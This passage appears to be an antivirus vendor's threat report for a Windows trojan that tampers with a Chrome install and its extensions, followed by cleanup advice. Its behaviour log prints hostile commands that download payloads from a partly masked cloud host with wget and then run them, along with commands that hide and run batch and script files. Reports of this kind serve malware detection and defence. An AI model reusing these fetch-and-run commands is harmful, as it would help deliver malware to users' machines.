  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\externallibs\zepto.min.js
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\css\custom.old.css
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\css\custom.css
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\css\chrome-bootstrap.css
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\contextmenu.js
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\background.html
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\_metadata\computed_hashes.json
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\sandbox.html
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\popup.html
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\options.html
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\manifest.json
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\zip.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\z-worker.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\utils.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\tools.js
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\icons\source.txt
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\manifest.json
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\omnibox.js
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\options.html
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\sandbox.js
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\scrollbar-handle-active.gif
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\scrollbar-down.gif
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\scrollbar-down-active.gif
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\rhtitle-bg.gif
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\icon_full.png
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\icon_empty.png
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\icon_del.png
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\icon-48.png
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\sha256.js
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\icon-16.png
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\options_compiled.js
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\bg.gif
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\css\popup.css
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\background.html
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\_locales\en\messages.json
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\treeoptions.js
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\options.old.html
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\options.js
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\icon-128.png
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\options_css_compiled.css
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\blank.png
  • C:\chrome\76.0.3809.100\notification_helper.exe
  • u:\chrome\userdata\default\extensions\djajcdbelhandnaichcbohaoefndhnde\1.3_0\popup.html
  • u:\chrome\userdata\default\extensions\djajcdbelhandnaichcbohaoefndhnde\1.3_0\manifest.json
  • u:\chrome\userdata\default\extensions\djajcdbelhandnaichcbohaoefndhnde\1.3_0\icon_txt.png
  • u:\chrome\userdata\default\extensions\djajcdbelhandnaichcbohaoefndhnde\1.3_0\icon.png
  • u:\chrome\userdata\default\extensions\djajcdbelhandnaichcbohaoefndhnde\1.3_0\custom.css
  • u:\chrome\userdata\default\extensions\cekfddagaicikmgoheekchngpadahmlf\1.6.7_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\cekfddagaicikmgoheekchngpadahmlf\1.6.7_0\_metadata\computed_hashes.json
  • u:\chrome\userdata\default\extensions\cekfddagaicikmgoheekchngpadahmlf\1.6.7_0\_locales\ru\messages.json
  • u:\chrome\userdata\default\extensions\cekfddagaicikmgoheekchngpadahmlf\1.6.7_0\manifest.json
  • u:\chrome\userdata\default\extensions\cekfddagaicikmgoheekchngpadahmlf\1.6.7_0\icon64.png
  • u:\chrome\userdata\default\extensions\cekfddagaicikmgoheekchngpadahmlf\1.6.7_0\icon128.png
  • u:\chrome\userdata\default\extensions\cekfddagaicikmgoheekchngpadahmlf\1.6.7_0\icon.png
  • u:\chrome\userdata\default\extensions\cekfddagaicikmgoheekchngpadahmlf\1.6.7_0\data\content.js
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\_metadata\computed_hashes.json
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\_locales\ru\messages.json
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\_locales\en\messages.json
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\popup_css_compiled.css
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\popup_compiled.js
  • u:\chrome\userdata\default\extensions\djajcdbelhandnaichcbohaoefndhnde\1.3_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\css\bootstrap.css
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\css\options.css
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\css\popup.css
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\options.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\inflate.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\extension.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\bg.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\includes\sovetnik.opera.min.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\includes\sbinject.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\includes\operastore.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\opera-logo.svg
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\icon_48.png
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\popup.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\icon_38.png
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\js\markdown.min.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\icon_16.png
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\icon_128.png
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\icon.svg
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\ext\vktm-image-zoom.png
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\ext\simple-to-do-list.png
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\ext\scroller.png
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\ext\notepad.png
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\ext\multi-links.png
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\icon_19.png
  • u:\chrome\userdata\last version
Deletes the following files
  • %TEMP%\ok.js
  • u:\chrome\76.0.3809.100\default_apps\drive.crx
  • u:\chrome\76.0.3809.100\default_apps\docs.crx
  • u:\chrome\master_preferences_zoom-100%
  • u:\chrome\master_preferences
  • %TEMP%\0chrome.exe
  • %TEMP%\123chrome.exe
  • %TEMP%\wget.exe
  • %TEMP%\conf2chrome
  • %TEMP%\conf1chrome
  • %TEMP%\4wvhh5s1uchrome
  • %TEMP%\7chrome.#
  • %TEMP%\6chrome.#
  • %TEMP%\5chrome.#
  • %TEMP%\4chrome.#
  • %TEMP%\3chrome.#
  • %TEMP%\2chrome.#
  • %TEMP%\1chrome.#
  • %TEMP%\0chrome.#
  • %WINDIR%\temp\udda2c4.tmp
  • u:\chrome\76.0.3809.100\default_apps\gmail.crx
  • u:\chrome\76.0.3809.100\default_apps\youtube.crx
Moves the following files
  • from %TEMP%\2mvpt9fx1 to %TEMP%\snapshot.exe
  • from %TEMP%\4wvhh5s1u to %TEMP%\4wvhh5s1uchrome
Substitutes the following files
  • %TEMP%\ok.js
Network activity
Connects to
  • 'cl######.datacloudmail.ru':80
  • 'cl######.datacloudmail.ru':443
TCP
  • 'cl######.datacloudmail.ru':443
UDP
  • DNS ASK cl######.datacloudmail.ru
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
  • ClassName: '' WindowName: '1149914/908'
  • ClassName: '' WindowName: '1150351/2716'
Creates and executes the following
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=3Chrome.# http://cl######.datacloudmail.ru/weblink/get/5w4N/3CU11pRNB
  • '%TEMP%\0chrome.exe'
  • '%TEMP%\123chrome.exe'
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=6Chrome.# http://cl######.datacloudmail.ru/weblink/get/2PNL/2z5CEzQih
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=7Chrome.# http://cl######.datacloudmail.ru/weblink/get/449Q/2M9d9xUJx
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=5Chrome.# http://cl######.datacloudmail.ru/weblink/get/5qzH/35m7dvZDQ
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=4Chrome.# http://cl######.datacloudmail.ru/weblink/get/3ceU/5jHut9fAm
  • 'C:\chrome\chrome.exe' --type=watcher --main-thread-id=828 --on-initialized-event-handle=28 --parent-handle=164 /prefetch:6
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=2Chrome.# http://cl######.datacloudmail.ru/weblink/get/EPDP/2rjryuppc
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=1Chrome.# http://cl######.datacloudmail.ru/weblink/get/2w6W/4qR6VttC9
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=0Chrome.# http://cl######.datacloudmail.ru/weblink/get/3i8S/3PbMVu4a5
  • '%TEMP%\wget.exe' --no-check-certificate http://cl######.datacloudmail.ru/weblink/get/3egv/4Wvhh5S1u
  • '%TEMP%\snapshot.exe' Rd.Sna U: -vq
  • '%TEMP%\snapshot.exe' -!unmount
  • '%TEMP%\wget.exe' --no-check-certificate --output-document=Rd.Sna http://cl######.datacloudmail.ru/weblink/get/2gXn/hH5sR16jd
  • '%TEMP%\wget.exe' --no-check-certificate http://cl######.datacloudmail.ru/weblink/get/3FZq/2MVPt9fx1
  • 'C:\chrome\chrome.exe' --user-data-dir=U:\Chrome\UserData --disable-infobars --disable-logging --allow-outdated-plugins https://join.skype.com/<File name>.exe
  • 'C:\chrome\chrome.exe' --type=crashpad-handler --user-data-dir=U:\Chrome\UserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=U:\Chrome\UserData\Crashpad --metrics-dir=U:\Chrome\UserData -...
  • '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\Chrome76.Bat" "<Full path to file>" "<Current directory>" "<File name>.exe" "%LOCALAPPDATA%\Temp" "' (with hidden window)
  • 'C:\chrome\chrome.exe' --type=watcher --main-thread-id=828 --on-initialized-event-handle=28 --parent-handle=164 /prefetch:6' (with hidden window)
Executes the following
  • '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\Chrome76.Bat" "<Full path to file>" "<Current directory>" "<File name>.exe" "%LOCALAPPDATA%\Temp" "
  • '%WINDIR%\syswow64\xcopy.exe' /i/h/y/r "%TEMP%\Master_Preferences"
  • '%WINDIR%\syswow64\xcopy.exe' /I/H/Y/R/E "U:\Chrome\76.0.3809.100" "76.0.3809.100\"
  • '%WINDIR%\syswow64\xcopy.exe' /I/H/Y/R/E "U:\Chrome\Master_Preferences"
  • '%WINDIR%\syswow64\findstr.exe' /BIR "A....."
  • '%WINDIR%\syswow64\attrib.exe' "<Full path to file>"
  • '%WINDIR%\syswow64\attrib.exe' -r %TEMP%\wz.bat
  • '%WINDIR%\syswow64\find.exe' /i "Wget.Exe"
  • '%WINDIR%\syswow64\tasklist.exe' /fi "IMAGENAME eq Wget.Exe"
  • '%WINDIR%\syswow64\ping.exe' -n 2 localhost
  • '%WINDIR%\syswow64\cmd.exe' /K wg.bat
  • '%WINDIR%\syswow64\attrib.exe' +r SnapShot.Exe
  • '%WINDIR%\syswow64\attrib.exe' +a +r +h +s SnapShod0.Sys
  • '%WINDIR%\syswow64\ping.exe' -n 6 localhost
  • '%WINDIR%\syswow64\cmd.exe' /K wz.bat
  • '%WINDIR%\syswow64\attrib.exe' +r wz.bat
  • '%WINDIR%\syswow64\cscript.exe' Ok.Js //Nologo
  • '%WINDIR%\syswow64\attrib.exe' +r Chrome76.bat
  • '%WINDIR%\syswow64\xcopy.exe' /I/H/Y/R/E "%TEMP%\76.0.3809.100" "76.0.3809.100\"
  • '%WINDIR%\syswow64\xcopy.exe' /I/H/Y/R/E "%TEMP%\UserData" "U:\Chrome\UserData\"

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Free trial

 

Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

Free trial

 

Download Dr.Web

Download by serial number

Download on App Store

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

 

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Free trial

14 days

Download now
Get it on Google Play